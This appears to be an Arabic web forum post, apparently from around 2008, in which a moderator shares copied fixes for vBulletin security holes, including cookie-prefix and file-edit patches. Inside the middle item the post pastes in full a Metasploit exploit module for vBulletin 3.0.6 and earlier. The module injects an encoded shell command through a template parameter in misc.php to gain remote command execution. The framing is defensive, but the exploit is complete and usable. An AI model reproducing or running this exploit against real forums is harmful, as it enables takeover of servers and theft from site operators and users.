|
|
|||||||
| التسجيل | التعليمات | قائمة الأعضاء | التقويم | البحث | مشاركات اليوم | اجعل جميع المنتديات مقروءة |
| برامج كمبيوتر برامج كمبيوتر برامج جديده برامج مجانيه برامج غريبه برامج سينما برامج سينما برامج صوتيه برامج فرومات برامج الوان برامج انتي فايروس كاسبر سكاي برنامج مكافي برنامج حمايه برامج حمايه كمبيوتر برامج عالميه برامج مونتاج برامج غريبه برامج اصحاب المواقع برامج العاب تحميل برامج برامج للتحميل برامج ماسنجر نكنيمات نك نيمات ماسنجر نكات اسماء للمسنجر برامج خطوط كمبيوتر تحميل برامج شرح برامج مجانية برامج كمبيوتر برنامج محول الصوتيات برنامج تحميل برنامج الجافا برامج الكمبيوتر برنامج ترجمة تنزيل برامج برنامج كاسبر خطوط عربية برنامج الياهو برامج حماية برنامج mp3 برنامج جافا برنامج النيرو برنامج ريل بلير برامج ترجمة برنامج winrar برنامج الريل بلير برامج تحويل برامج تعليمية برامج 2008 برامج الحماية برنامج ضغط برنامج نيرو برنامج الحارس الذكي برنامج jap برنامج المؤذن برنامج ftp برنامج الوافي الذهبي برنامج الجاب برنامج جاب برنامج تحويل الصوتيات برنامج internet download manager برنامج حماية برامج جديدة برامج التحميل برنامج تورنت برنامج ترجمه برنامج تسجيل برنامج سارق الصور برنامج التورنت برنامج ياهو برامج صوت برامج حمايه خطوط سما برنامج الاذان برنامج تحويل الفيديو برنامج فك الضغط برنامج التحميل برامج مجانيه برنامج الكاسبر برنامج للتحميل برامج الصوت برامج للكمبيوتر برامج تشغيل برنامج download برامج اسلامية برنامج كاسبر سكاي خطوط عربيه برنامج تسريع التحميل برامج ضغط شرح برامج برامج ترجمه تحميل برنامج الجافا خلفيات كمبيوتر برامج للتحميل برنامج مترجم برنامج تغيير الصوت برنامج الرسام تحميل برنامج محول الصوتيات برامج جديده |
شات سعودي منتديات اغاني :: العاب : :: برامج نوكيا: بلوتوث :: زواج :: شات
![]() |
|
|
LinkBack | أدوات الموضوع | إبحث في الموضوع | طرق مشاهدة الموضوع |
|
|
#1 |
|
مشرف
![]()
معدل تقييم المستوى: 1
![]() |
سوف اضع بعض ترقيع ثغرات المنتديات راجي من الله الاستفاده
والحلول طبعا منقوله من كذا موقع ...... ثغره في ملف اخر عشره مواضيع قم بفتح ملف العشره مواضيع باسم (last10config.php) او (configlast.php) الترقيع سهل ابحث عن كلمة وامسحها $fsel وكذلك كلمة $ftitle انسخ الكلمه والصقها في البحث ثم احفظ الملف وارفعه مره اخرى ... ------------------------------------------------------- ثغره تمكنك من رفع شل على الموقع وللترقيع الترقيه الي اخر اصدار او الي قبله كود: ## # Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit # Name: php_vb3_0_6.pm # License: Artistic/BSD/GPL # Info: trying to get the command execution exploits out of the way on milw0rm.com. M's are always good. # # # - This is an exploit module for the ****sploit Framework, please see # http://****sploit.com/projects/Framework for more information. ## package Msf::Exploit:hp_vb3_0_6; use base "Msf::Exploit"; use strict; use Pex::Text; use bytes; my $advanced = { }; my $info = { 'Name' => 'vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit', 'Version' => '$Revision: 1.0 $', 'Authors' => [ 'str0ke' ], 'Arch' => [ ], 'OS' => [ ], 'Priv' => 0, 'UserOpts' => { 'RHOST' => [1, 'ADDR', 'The target address'], 'RPORT' => [1, 'PORT', 'The target port', 80], 'VHOST' => [0, 'DATA', 'The virtual host name of the server'], 'RPATH' => [1, 'DATA', 'Path to the misc.php ******', '/forum/misc.php'], 'SSL' => [0, 'BOOL', 'Use SSL'], }, 'De***********on' => Pex::Text::Freeform(qq{ This module exploits a code execution flaw in vBulletin <= 3.0.6. }), 'Refs' => [ ['MIL', '832'], ], 'Payload' => { 'Space' => 512, 'Keys' => ['cmd', 'cmd_bash'], }, 'Keys' => ['vBulletin'], }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $vhost = $self->GetVar('VHOST') || $target_host; my $path = $self->GetVar('RPATH'); my $cmd = $self->GetVar('EncodedPayload')->RawPayload; # Encode the command as a set of chr() function calls my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd)); # Create the get request data my $data = "?do=page&template={\${passthru($byte)}}"; my $req = "GET $path$data HTTP/1.1\r\n". "Host: $vhost:$target_port\r\n". "Content-Type: application/html\r\n". "Content-Length: ". length($data)."\r\n". "Connection: Close\r\n". "\r\n"; my $s = Msf::Socket::Tcp->new( 'PeerAddr' => $target_host, 'PeerPort' => $target_port, 'LocalPort' => $self->GetVar('CPORT'), 'SSL' => $self->GetVar('SSL'), ); if ($s->IsError){ $self->PrintLine(' Error creating socket: ' . $s->GetError); return; } $self->PrintLine(" Sending the malicious vBulletin Get request..."); $s->Send($req); my $results = $s->Recv(-1, 20); $s->Close(); return; } 1; وللتوضيح اكثر الثغره في ملف misc.php للاهميه اخذ نسخه من الملف قبل الترقيع ------------------------------------------------------ [ثغره] بملف config.php تختص بالكوكيز يستطيع الهكر الدخول من خلالها على بمستخدم الادمن بعد تعديل الكوكيز .. طريقه سد الثغره كالتالي : افتح ملف الكونفيق الي في منتداك // Prefix that all vBulletin ******* will have // For example $******prefix = 'bb'; غير الحرف bb الى اي حروف تبيها المهم غير bb ------------------------------------------------------- منقول [img] [/img] |
|
|
|
![]() |
| أدوات الموضوع | إبحث في الموضوع |
| طرق مشاهدة الموضوع | |
|
|
المواضيع المتشابهه
|
||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| وصف لشكل وصفات النبي الحبيب محمد عليه الصلاه والسلام | يا عيون احمد | منتديات اسلاميه | 6 | 06-01-2008 10:43 PM |
| وصف النبي r وصفاته | أسير الروح | منتديات اسلاميه | 0 | 02-08-2008 02:44 PM |
| مفصل دلائل النبوة | $$$المجنوون$$$ | منتديات اسلاميه | 4 | 12-06-2007 03:00 PM |
| جـمـيـع الـفـتـاوي الـمـهـمـة لـلـصـائـمـيـن والـصـائـمـات | $$$ الحب الخالد $$$ | الخيمه الرمضانيه | 3 | 11-01-2007 03:03 PM |
![]() |
![]() |
|